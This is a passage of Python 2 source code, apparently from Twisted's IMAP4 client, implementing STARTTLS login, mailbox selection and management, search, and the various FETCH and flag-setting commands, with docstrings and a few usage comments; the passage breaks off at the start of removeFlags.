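# STARTTLS is attempted first whenever both peers support it.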
def serverGreeting(self, caps):
"""Called when the server has sent us a greeting.
@type caps: C{dict}
@param caps: Capabilities the server advertised in its greeting.
"""
def _getContextFactory(self):
if self.context is not None:
return self.context
try:
from twisted.internet import ssl
except ImportError:
return None
else:
context = ssl.ClientContextFactory()
context.method = ssl.SSL.TLSv1_METHOD
return context
def __cbLoginCaps(self, capabilities, username, password):
# If the server advertises STARTTLS, we might want to try to switch to TLS
tryTLS = 'STARTTLS' in capabilities
# If our transport supports switching to TLS, we might want to try to switch to TLS.
tlsableTransport = interfaces.ITLSTransport(self.transport, None) is not None
# If our transport is not already using TLS, we might want to try to switch to TLS.
nontlsTransport = interfaces.ISSLTransport(self.transport, None) is None
if not self.startedTLS and tryTLS and tlsableTransport and nontlsTransport:
d = self.startTLS()
d.addCallbacks(
self.__cbLoginTLS,
self.__ebLoginTLS,
callbackArgs=(username, password),
)
return d
else:
if nontlsTransport:
log.msg("Server has no TLS support. logging in over cleartext!")
args = ' '.join((_quote(username), _quote(password)))
return self.sendCommand(Command('LOGIN', args))
def _startedTLS(self, result, context):
self.transport.startTLS(context)
self._capCache = None
self.startedTLS = True
return result
def __cbLoginTLS(self, result, username, password):
args = ' '.join((_quote(username), _quote(password)))
return self.sendCommand(Command('LOGIN', args))
def __ebLoginTLS(self, failure):
log.err(failure)
return failure
def namespace(self):
"""Retrieve information about the namespaces available to this account
This command is allowed in the Authenticated and Selected states.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with namespace
information. An example of this information is::
[[['', '/']], [], []]
which indicates a single personal namespace called '' with '/'
as its hierarchical delimiter, and no shared or user namespaces.
"""
cmd = 'NAMESPACE'
resp = ('NAMESPACE',)
d = self.sendCommand(Command(cmd, wantResponse=resp))
d.addCallback(self.__cbNamespace)
return d
def __cbNamespace(self, (lines, last)):
for parts in lines:
if len(parts) == 4 and parts[0] == 'NAMESPACE':
return [e or [] for e in parts[1:]]
log.err("No NAMESPACE response to NAMESPACE command")
return [[], [], []]
def select(self, mailbox):
"""
Select a mailbox
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The name of the mailbox to select
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with mailbox
information if the select is successful and whose errback is
invoked otherwise. Mailbox information consists of a dictionary
with the following keys and values::
FLAGS: A list of strings containing the flags settable on
messages in this mailbox.
EXISTS: An integer indicating the number of messages in this
mailbox.
RECENT: An integer indicating the number of "recent"
messages in this mailbox.
UNSEEN: The message sequence number (an integer) of the
first unseen message in the mailbox.
PERMANENTFLAGS: A list of strings containing the flags that
can be permanently set on messages in this mailbox.
UIDVALIDITY: An integer uniquely identifying this mailbox.
"""
cmd = 'SELECT'
args = _prepareMailboxName(mailbox)
resp = ('FLAGS', 'EXISTS', 'RECENT', 'UNSEEN', 'PERMANENTFLAGS', 'UIDVALIDITY')
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbSelect, 1)
return d
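# Illustrative usage (comment only): proto.select('INBOX') fires its
# Deferred with a dict such as
#   {'EXISTS': 10, 'RECENT': 1, 'READ-WRITE': True, 'FLAGS': (...)}
# built by __cbSelect from the untagged SELECT responses.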
def examine(self, mailbox):
"""Select a mailbox in read-only mode
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The name of the mailbox to examine
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with mailbox
information if the examine is successful and whose errback
is invoked otherwise. Mailbox information consists of a dictionary
with the following keys and values::
'FLAGS': A list of strings containing the flags settable on
messages in this mailbox.
'EXISTS': An integer indicating the number of messages in this
mailbox.
'RECENT': An integer indicating the number of \"recent\"
messages in this mailbox.
'UNSEEN': An integer indicating the number of messages not
flagged \\Seen in this mailbox.
'PERMANENTFLAGS': A list of strings containing the flags that
can be permanently set on messages in this mailbox.
'UIDVALIDITY': An integer uniquely identifying this mailbox.
"""
cmd = 'EXAMINE'
args = _prepareMailboxName(mailbox)
resp = ('FLAGS', 'EXISTS', 'RECENT', 'UNSEEN', 'PERMANENTFLAGS', 'UIDVALIDITY')
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbSelect, 0)
return d
def _intOrRaise(self, value, phrase):
"""
Parse C{value} as an integer and return the result or raise
L{IllegalServerResponse} with C{phrase} as an argument if C{value}
cannot be parsed as an integer.
"""
try:
return int(value)
except ValueError:
raise IllegalServerResponse(phrase)
def __cbSelect(self, (lines, tagline), rw):
"""
Handle lines received in response to a SELECT or EXAMINE command.
See RFC 3501, section 6.3.1.
"""
# In the absence of a specification, we are free to assume:
# READ-WRITE access
datum = {'READ-WRITE': rw}
lines.append(parseNestedParens(tagline))
for split in lines:
if len(split) > 0 and split[0].upper() == 'OK':
# Handle all the kinds of OK response.
content = split[1]
key = content[0].upper()
if key == 'READ-ONLY':
datum['READ-WRITE'] = False
elif key == 'READ-WRITE':
datum['READ-WRITE'] = True
elif key == 'UIDVALIDITY':
datum['UIDVALIDITY'] = self._intOrRaise(
content[1], split)
elif key == 'UNSEEN':
datum['UNSEEN'] = self._intOrRaise(content[1], split)
elif key == 'UIDNEXT':
datum['UIDNEXT'] = self._intOrRaise(content[1], split)
elif key == 'PERMANENTFLAGS':
datum['PERMANENTFLAGS'] = tuple(content[1])
else:
log.err('Unhandled SELECT response (2): %s' % (split,))
elif len(split) == 2:
# Handle FLAGS, EXISTS, and RECENT
if split[0].upper() == 'FLAGS':
datum['FLAGS'] = tuple(split[1])
elif isinstance(split[1], str):
# Must make sure things are strings before treating them as
# strings since some other forms of response have nesting in
# places which results in lists instead.
if split[1].upper() == 'EXISTS':
datum['EXISTS'] = self._intOrRaise(split[0], split)
elif split[1].upper() == 'RECENT':
datum['RECENT'] = self._intOrRaise(split[0], split)
else:
log.err('Unhandled SELECT response (0): %s' % (split,))
else:
log.err('Unhandled SELECT response (1): %s' % (split,))
else:
log.err('Unhandled SELECT response (4): %s' % (split,))
return datum
def create(self, name):
"""Create a new mailbox on the server
This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The name of the mailbox to create.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the mailbox creation
is successful and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('CREATE', _prepareMailboxName(name)))
def delete(self, name):
"""Delete a mailbox
This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The name of the mailbox to delete.
@rtype: C{Deferred}
        @return: A deferred whose callback is invoked if the mailbox is
deleted successfully and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('DELETE', _prepareMailboxName(name)))
def rename(self, oldname, newname):
"""Rename a mailbox
This command is allowed in the Authenticated and Selected states.
@type oldname: C{str}
@param oldname: The current name of the mailbox to rename.
@type newname: C{str}
@param newname: The new name to give the mailbox.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the rename is
successful and whose errback is invoked otherwise.
"""
oldname = _prepareMailboxName(oldname)
newname = _prepareMailboxName(newname)
return self.sendCommand(Command('RENAME', ' '.join((oldname, newname))))
def subscribe(self, name):
"""Add a mailbox to the subscription list
This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The mailbox to mark as 'active' or 'subscribed'
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the subscription
is successful and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('SUBSCRIBE', _prepareMailboxName(name)))
def unsubscribe(self, name):
"""Remove a mailbox from the subscription list
This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The mailbox to unsubscribe
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the unsubscription
is successful and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('UNSUBSCRIBE', _prepareMailboxName(name)))
def list(self, reference, wildcard):
"""List a subset of the available mailboxes
This command is allowed in the Authenticated and Selected states.
@type reference: C{str}
@param reference: The context in which to interpret C{wildcard}
@type wildcard: C{str}
@param wildcard: The pattern of mailbox names to match, optionally
including either or both of the '*' and '%' wildcards. '*' will
match zero or more characters and cross hierarchical boundaries.
'%' will also match zero or more characters, but is limited to a
single hierarchical level.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a list of C{tuple}s,
the first element of which is a C{tuple} of mailbox flags, the second
element of which is the hierarchy delimiter for this mailbox, and the
third of which is the mailbox name; if the command is unsuccessful,
the deferred's errback is invoked instead.
"""
cmd = 'LIST'
args = '"%s" "%s"' % (reference, wildcard.encode('imap4-utf-7'))
resp = ('LIST',)
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbList, 'LIST')
return d
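    # Editorial illustration (not part of the original module): listing
    # every mailbox via the hypothetical `proto` client; each result is a
    # (flags, delimiter, name) tuple as described above.
    #
    #     d = proto.list('', '*')
    #     d.addCallback(lambda boxes: [name for flags, delim, name in boxes])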
def lsub(self, reference, wildcard):
"""List a subset of the subscribed available mailboxes
This command is allowed in the Authenticated and Selected states.
The parameters and returned object are the same as for the C{list}
        method, with one slight difference: only mailboxes which have been
        subscribed to may be included in the resulting list.
"""
cmd = 'LSUB'
args = '"%s" "%s"' % (reference, wildcard.encode('imap4-utf-7'))
resp = ('LSUB',)
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbList, 'LSUB')
return d
def __cbList(self, (lines, last), command):
results = []
for parts in lines:
if len(parts) == 4 and parts[0] == command:
parts[1] = tuple(parts[1])
results.append(tuple(parts[1:]))
return results
def status(self, mailbox, *names):
"""
Retrieve the status of the given mailbox
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The name of the mailbox to query
@type *names: C{str}
@param *names: The status names to query. These may be any number of:
C{'MESSAGES'}, C{'RECENT'}, C{'UIDNEXT'}, C{'UIDVALIDITY'}, and
C{'UNSEEN'}.
@rtype: C{Deferred}
        @return: A deferred which fires with the status information if the
command is successful and whose errback is invoked otherwise. The
status information is in the form of a C{dict}. Each element of
C{names} is a key in the dictionary. The value for each key is the
corresponding response from the server.
"""
cmd = 'STATUS'
args = "%s (%s)" % (_prepareMailboxName(mailbox), ' '.join(names))
resp = ('STATUS',)
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbStatus)
return d
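    # Editorial illustration (not part of the original module): querying
    # message counts on the hypothetical `proto` client; the callback
    # receives a dict such as {'MESSAGES': 12, 'UNSEEN': 3}.
    #
    #     d = proto.status('INBOX', 'MESSAGES', 'UNSEEN')
    #     d.addCallback(lambda s: s['UNSEEN'])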
def __cbStatus(self, (lines, last)):
status = {}
for parts in lines:
if parts[0] == 'STATUS':
items = parts[2]
items = [items[i:i+2] for i in range(0, len(items), 2)]
status.update(dict(items))
for k in status.keys():
t = self.STATUS_TRANSFORMATIONS.get(k)
if t:
try:
status[k] = t(status[k])
except Exception, e:
raise IllegalServerResponse('(%s %s): %s' % (k, status[k], str(e)))
return status
def append(self, mailbox, message, flags = (), date = None):
"""Add the given message to the given mailbox.
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The mailbox to which to add this message.
@type message: Any file-like object
@param message: The message to add, in RFC822 format. Newlines
in this file should be \\r\\n-style.
@type flags: Any iterable of C{str}
        @param flags: The flags to associate with this message.
@type date: C{str}
        @param date: The date to associate with this message. This should
        be of the format DD-Mon-YYYY HH:MM:SS +/-HHMM, as required by
        RFC 3501. For example, in Eastern Daylight Time, on July 1st 2004
        at half past 1 PM, \"01-Jul-2004 13:30:00 -0400\".
@rtype: C{Deferred}
@return: A deferred whose callback is invoked when this command
succeeds or whose errback is invoked if it fails.
"""
message.seek(0, 2)
L = message.tell()
message.seek(0, 0)
fmt = '%s (%s)%s {%d}'
if date:
date = ' "%s"' % date
else:
date = ''
cmd = fmt % (
_prepareMailboxName(mailbox), ' '.join(flags),
date, L
)
d = self.sendCommand(Command('APPEND', cmd, (), self.__cbContinueAppend, message))
return d
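    # Editorial illustration (not part of the original module): appending
    # a message held in a StringIO (any seekable file-like object works,
    # provided its newlines are CRLF); `proto` is hypothetical.
    #
    #     from StringIO import StringIO
    #     msg = StringIO('From: alice@example.com\r\n\r\nHello.\r\n')
    #     d = proto.append('INBOX', msg, flags=('\\Seen',))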
def __cbContinueAppend(self, lines, message):
s = basic.FileSender()
return s.beginFileTransfer(message, self.transport, None
).addCallback(self.__cbFinishAppend)
def __cbFinishAppend(self, foo):
self.sendLine('')
def check(self):
"""Tell the server to perform a checkpoint
This command is allowed in the Selected state.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked when this command
succeeds or whose errback is invoked if it fails.
"""
return self.sendCommand(Command('CHECK'))
def close(self):
"""Return the connection to the Authenticated state.
This command is allowed in the Selected state.
Issuing this command will also remove all messages flagged \\Deleted
from the selected mailbox if it is opened in read-write mode,
        otherwise it indicates success but no messages are removed.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked when the command
completes successfully or whose errback is invoked if it fails.
"""
return self.sendCommand(Command('CLOSE'))
def expunge(self):
"""Return the connection to the Authenticate state.
This command is allowed in the Selected state.
Issuing this command will perform the same actions as issuing the
close command, but will also generate an 'expunge' response for
every message deleted.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a list of the
'expunge' responses when this command is successful or whose errback
is invoked otherwise.
"""
cmd = 'EXPUNGE'
resp = ('EXPUNGE',)
d = self.sendCommand(Command(cmd, wantResponse=resp))
d.addCallback(self.__cbExpunge)
return d
def __cbExpunge(self, (lines, last)):
ids = []
for parts in lines:
if len(parts) == 2 and parts[1] == 'EXPUNGE':
ids.append(self._intOrRaise(parts[0], parts))
return ids
def search(self, *queries, **kwarg):
"""Search messages in the currently selected mailbox
This command is allowed in the Selected state.
        Any non-zero number of queries is accepted by this method, as
returned by the C{Query}, C{Or}, and C{Not} functions.
One keyword argument is accepted: if uid is passed in with a non-zero
value, the server is asked to return message UIDs instead of message
sequence numbers.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with a list of all
        the message sequence numbers returned by the search, or whose errback
will be invoked if there is an error.
"""
if kwarg.get('uid'):
cmd = 'UID SEARCH'
else:
cmd = 'SEARCH'
args = ' '.join(queries)
d = self.sendCommand(Command(cmd, args, wantResponse=(cmd,)))
d.addCallback(self.__cbSearch)
return d
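    # Editorial illustration (not part of the original module): searching
    # for unseen messages by UID on the hypothetical `proto` client,
    # building the query string with the C{Query} helper defined below.
    #
    #     d = proto.search(Query(unseen=1), uid=1)
    #     d.addCallback(lambda uids: uids)  # e.g. [105, 106, 109]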
def __cbSearch(self, (lines, end)):
ids = []
for parts in lines:
if len(parts) > 0 and parts[0] == 'SEARCH':
ids.extend([self._intOrRaise(p, parts) for p in parts[1:]])
return ids
def fetchUID(self, messages, uid=0):
"""Retrieve the unique identifier for one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message sequence numbers to unique message identifiers, or whose
errback is invoked if there is an error.
"""
return self._fetch(messages, useUID=uid, uid=1)
def fetchFlags(self, messages, uid=0):
"""Retrieve the flags for one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve flags.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to lists of flags, or whose errback is invoked if
there is an error.
"""
return self._fetch(str(messages), useUID=uid, flags=1)
def fetchInternalDate(self, messages, uid=0):
"""Retrieve the internal date associated with one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve the internal date.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to date strings, or whose errback is invoked
if there is an error. Date strings take the format of
\"day-month-year time timezone\".
"""
return self._fetch(str(messages), useUID=uid, internaldate=1)
def fetchEnvelope(self, messages, uid=0):
"""Retrieve the envelope data for one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve envelope data.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to envelope data, or whose errback is invoked
if there is an error. Envelope data consists of a sequence of the
date, subject, from, sender, reply-to, to, cc, bcc, in-reply-to,
and message-id header fields. The date, subject, in-reply-to, and
message-id fields are strings, while the from, sender, reply-to,
to, cc, and bcc fields contain address data. Address data consists
of a sequence of name, source route, mailbox name, and hostname.
Fields which are not present for a particular address may be C{None}.
"""
return self._fetch(str(messages), useUID=uid, envelope=1)
def fetchBodyStructure(self, messages, uid=0):
"""Retrieve the structure of the body of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: The messages for which to retrieve body structure
data.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to body structure data, or whose errback is invoked
if there is an error. Body structure data describes the MIME-IMB
format of a message and consists of a sequence of mime type, mime
subtype, parameters, content id, description, encoding, and size.
The fields following the size field are variable: if the mime
type/subtype is message/rfc822, the contained message's envelope
information, body structure data, and number of lines of text; if
the mime type is text, the number of lines of text. Extension fields
may also be included; if present, they are: the MD5 hash of the body,
body disposition, body language.
"""
return self._fetch(messages, useUID=uid, bodystructure=1)
def fetchSimplifiedBody(self, messages, uid=0):
"""Retrieve the simplified body structure of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to body data, or whose errback is invoked
if there is an error. The simplified body structure is the same
as the body structure, except that extension fields will never be
present.
"""
return self._fetch(messages, useUID=uid, body=1)
def fetchMessage(self, messages, uid=0):
"""Retrieve one or more entire messages
This command is allowed in the Selected state.
@type messages: L{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: L{Deferred}
@return: A L{Deferred} which will fire with a C{dict} mapping message
sequence numbers to C{dict}s giving message data for the
corresponding message. If C{uid} is true, the inner dictionaries
have a C{'UID'} key mapped to a C{str} giving the UID for the
message. The text of the message is a C{str} associated with the
C{'RFC822'} key in each dictionary.
"""
return self._fetch(messages, useUID=uid, rfc822=1)
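    # Editorial illustration (not part of the original module): fetching
    # the full text of message 1 on the hypothetical `proto` client; the
    # result maps sequence numbers to dicts keyed by 'RFC822'.
    #
    #     d = proto.fetchMessage('1')
    #     d.addCallback(lambda res: res[1]['RFC822'])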
def fetchHeaders(self, messages, uid=0):
"""Retrieve headers of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to dicts of message headers, or whose errback is
invoked if there is an error.
"""
return self._fetch(messages, useUID=uid, rfc822header=1)
def fetchBody(self, messages, uid=0):
"""Retrieve body text of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to file-like objects containing body text, or whose
errback is invoked if there is an error.
"""
return self._fetch(messages, useUID=uid, rfc822text=1)
def fetchSize(self, messages, uid=0):
"""Retrieve the size, in octets, of one or more messages
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
message numbers to sizes, or whose errback is invoked if there is
an error.
"""
return self._fetch(messages, useUID=uid, rfc822size=1)
def fetchFull(self, messages, uid=0):
"""Retrieve several different fields of one or more messages
This command is allowed in the Selected state. This is equivalent
to issuing all of the C{fetchFlags}, C{fetchInternalDate},
C{fetchSize}, C{fetchEnvelope}, and C{fetchSimplifiedBody}
functions.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
        message numbers to dicts of the retrieved data values, or whose
        errback is invoked if there is an error. The dictionary keys
are "flags", "date", "size", "envelope", and "body".
"""
return self._fetch(
messages, useUID=uid, flags=1, internaldate=1,
rfc822size=1, envelope=1, body=1)
def fetchAll(self, messages, uid=0):
"""Retrieve several different fields of one or more messages
This command is allowed in the Selected state. This is equivalent
to issuing all of the C{fetchFlags}, C{fetchInternalDate},
C{fetchSize}, and C{fetchEnvelope} functions.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
        message numbers to dicts of the retrieved data values, or whose
        errback is invoked if there is an error. The dictionary keys
are "flags", "date", "size", and "envelope".
"""
return self._fetch(
messages, useUID=uid, flags=1, internaldate=1,
rfc822size=1, envelope=1)
def fetchFast(self, messages, uid=0):
"""Retrieve several different fields of one or more messages
This command is allowed in the Selected state. This is equivalent
to issuing all of the C{fetchFlags}, C{fetchInternalDate}, and
C{fetchSize} functions.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a dict mapping
        message numbers to dicts of the retrieved data values, or whose
        errback is invoked if there is an error. The dictionary keys are
"flags", "date", and "size".
"""
return self._fetch(
messages, useUID=uid, flags=1, internaldate=1, rfc822size=1)
def _parseFetchPairs(self, fetchResponseList):
"""
Given the result of parsing a single I{FETCH} response, construct a
C{dict} mapping response keys to response values.
@param fetchResponseList: The result of parsing a I{FETCH} response
with L{parseNestedParens} and extracting just the response data
(that is, just the part that comes after C{"FETCH"}). The form
of this input (and therefore the output of this method) is very
            disagreeable. A valuable improvement would be to enumerate the
possible keys (representing them as structured objects of some
sort) rather than using strings and tuples of tuples of strings
and so forth. This would allow the keys to be documented more
easily and would allow for a much simpler application-facing API
(one not based on looking up somewhat hard to predict keys in a
dict). Since C{fetchResponseList} notionally represents a
flattened sequence of pairs (identifying keys followed by their
associated values), collapsing such complex elements of this
list as C{["BODY", ["HEADER.FIELDS", ["SUBJECT"]]]} into a
single object would also greatly simplify the implementation of
this method.
@return: A C{dict} of the response data represented by C{pairs}. Keys
in this dictionary are things like C{"RFC822.TEXT"}, C{"FLAGS"}, or
C{("BODY", ("HEADER.FIELDS", ("SUBJECT",)))}. Values are entirely
dependent on the key with which they are associated, but retain the
            same structure as produced by L{parseNestedParens}.
"""
values = {}
responseParts = iter(fetchResponseList)
while True:
try:
key = responseParts.next()
except StopIteration:
break
try:
value = responseParts.next()
except StopIteration:
raise IllegalServerResponse(
"Not enough arguments", fetchResponseList)
# The parsed forms of responses like:
#
# BODY[] VALUE
# BODY[TEXT] VALUE
# BODY[HEADER.FIELDS (SUBJECT)] VALUE
# BODY[HEADER.FIELDS (SUBJECT)]<N.M> VALUE
#
# are:
#
# ["BODY", [], VALUE]
# ["BODY", ["TEXT"], VALUE]
# ["BODY", ["HEADER.FIELDS", ["SUBJECT"]], VALUE]
# ["BODY", ["HEADER.FIELDS", ["SUBJECT"]], "<N.M>", VALUE]
#
# Here, check for these cases and grab as many extra elements as
# necessary to retrieve the body information.
if key in ("BODY", "BODY.PEEK") and isinstance(value, list) and len(value) < 3:
if len(value) < 2:
key = (key, tuple(value))
else:
key = (key, (value[0], tuple(value[1])))
try:
value = responseParts.next()
except StopIteration:
raise IllegalServerResponse(
"Not enough arguments", fetchResponseList)
# Handle partial ranges
if value.startswith('<') and value.endswith('>'):
try:
int(value[1:-1])
except ValueError:
# This isn't really a range, it's some content.
pass
else:
key = key + (value,)
try:
value = responseParts.next()
except StopIteration:
raise IllegalServerResponse(
"Not enough arguments", fetchResponseList)
values[key] = value
return values
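    # Editorial illustration (not part of the original module): the kind
    # of transformation this method performs on already-parsed response
    # data.
    #
    #     _parseFetchPairs(['FLAGS', ['\\Seen'], 'UID', '5'])
    #     ==> {'FLAGS': ['\\Seen'], 'UID': '5'}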
def _cbFetch(self, (lines, last), requestedParts, structured):
info = {}
for parts in lines:
if len(parts) == 3 and parts[1] == 'FETCH':
id = self._intOrRaise(parts[0], parts)
if id not in info:
info[id] = [parts[2]]
else:
info[id][0].extend(parts[2])
results = {}
for (messageId, values) in info.iteritems():
mapping = self._parseFetchPairs(values[0])
results.setdefault(messageId, {}).update(mapping)
flagChanges = {}
for messageId in results.keys():
values = results[messageId]
for part in values.keys():
if part not in requestedParts and part == 'FLAGS':
flagChanges[messageId] = values['FLAGS']
# Find flags in the result and get rid of them.
for i in range(len(info[messageId][0])):
if info[messageId][0][i] == 'FLAGS':
del info[messageId][0][i:i+2]
break
del values['FLAGS']
if not values:
del results[messageId]
if flagChanges:
self.flagsChanged(flagChanges)
if structured:
return results
else:
return info
def fetchSpecific(self, messages, uid=0, headerType=None,
headerNumber=None, headerArgs=None, peek=None,
offset=None, length=None):
"""Retrieve a specific section of one or more messages
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@type headerType: C{str}
@param headerType: If specified, must be one of HEADER,
HEADER.FIELDS, HEADER.FIELDS.NOT, MIME, or TEXT, and will determine
which part of the message is retrieved. For HEADER.FIELDS and
HEADER.FIELDS.NOT, C{headerArgs} must be a sequence of header names.
For MIME, C{headerNumber} must be specified.
@type headerNumber: C{int} or C{int} sequence
@param headerNumber: The nested rfc822 index specifying the
entity to retrieve. For example, C{1} retrieves the first
            entity of the message, and C{(2, 1, 3)} retrieves the 3rd
entity inside the first entity inside the second entity of
the message.
@type headerArgs: A sequence of C{str}
@param headerArgs: If C{headerType} is HEADER.FIELDS, these are the
headers to retrieve. If it is HEADER.FIELDS.NOT, these are the
headers to exclude from retrieval.
@type peek: C{bool}
@param peek: If true, cause the server to not set the \\Seen
flag on this message as a result of this command.
@type offset: C{int}
@param offset: The number of octets at the beginning of the result
to skip.
@type length: C{int}
@param length: The number of octets to retrieve.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with a mapping of
message numbers to retrieved data, or whose errback is invoked
if there is an error.
"""
fmt = '%s BODY%s[%s%s%s]%s'
if headerNumber is None:
number = ''
elif isinstance(headerNumber, int):
number = str(headerNumber)
else:
number = '.'.join(map(str, headerNumber))
if headerType is None:
header = ''
elif number:
header = '.' + headerType
else:
header = headerType
if header and headerType not in ('TEXT', 'MIME'):
if headerArgs is not None:
payload = ' (%s)' % ' '.join(headerArgs)
else:
payload = ' ()'
else:
payload = ''
if offset is None:
extra = ''
else:
extra = '<%d.%d>' % (offset, length)
fetch = uid and 'UID FETCH' or 'FETCH'
cmd = fmt % (messages, peek and '.PEEK' or '', number, header, payload, extra)
d = self.sendCommand(Command(fetch, cmd, wantResponse=('FETCH',)))
d.addCallback(self._cbFetch, (), False)
return d
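    # Editorial illustration (not part of the original module): fetching
    # only the Subject header of message 1 without setting \Seen, on the
    # hypothetical `proto` client. This issues
    # "FETCH 1 BODY.PEEK[HEADER.FIELDS (SUBJECT)]".
    #
    #     d = proto.fetchSpecific('1', headerType='HEADER.FIELDS',
    #                             headerArgs=['SUBJECT'], peek=1)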
def _fetch(self, messages, useUID=0, **terms):
fetch = useUID and 'UID FETCH' or 'FETCH'
if 'rfc822text' in terms:
del terms['rfc822text']
terms['rfc822.text'] = True
if 'rfc822size' in terms:
del terms['rfc822size']
terms['rfc822.size'] = True
if 'rfc822header' in terms:
del terms['rfc822header']
terms['rfc822.header'] = True
cmd = '%s (%s)' % (messages, ' '.join([s.upper() for s in terms.keys()]))
d = self.sendCommand(Command(fetch, cmd, wantResponse=('FETCH',)))
d.addCallback(self._cbFetch, map(str.upper, terms.keys()), True)
return d
def setFlags(self, messages, flags, silent=1, uid=0):
"""Set the flags for one or more messages.
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type flags: Any iterable of C{str}
@param flags: The flags to set
@type silent: C{bool}
        @param silent: If true, cause the server to suppress its verbose
response.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
        @return: A deferred whose callback is invoked with a list of
        the server's responses (C{[]} if C{silent} is true) or whose
errback is invoked if there is an error.
"""
return self._store(str(messages), 'FLAGS', silent, flags, uid)
def addFlags(self, messages, flags, silent=1, uid=0):
"""Add to the set flags for one or more messages.
This command is allowed in the Selected state.
@type messages: C{MessageSet} or C{str}
@param messages: A message sequence set
@type flags: Any iterable of C{str}
@param flags: The flags to set
@type silent: C{bool}
        @param silent: If true, cause the server to suppress its verbose
response.
@type uid: C{bool}
@param uid: Indicates whether the message sequence set is of message
numbers or of unique message IDs.
@rtype: C{Deferred}
        @return: A deferred whose callback is invoked with a list of
        the server's responses (C{[]} if C{silent} is true) or whose
errback is invoked if there is an error.
"""
return self._store(str(messages),'+FLAGS', silent, flags, uid)
def removeFlags(self, messages, flags, silent=1, uid=0):
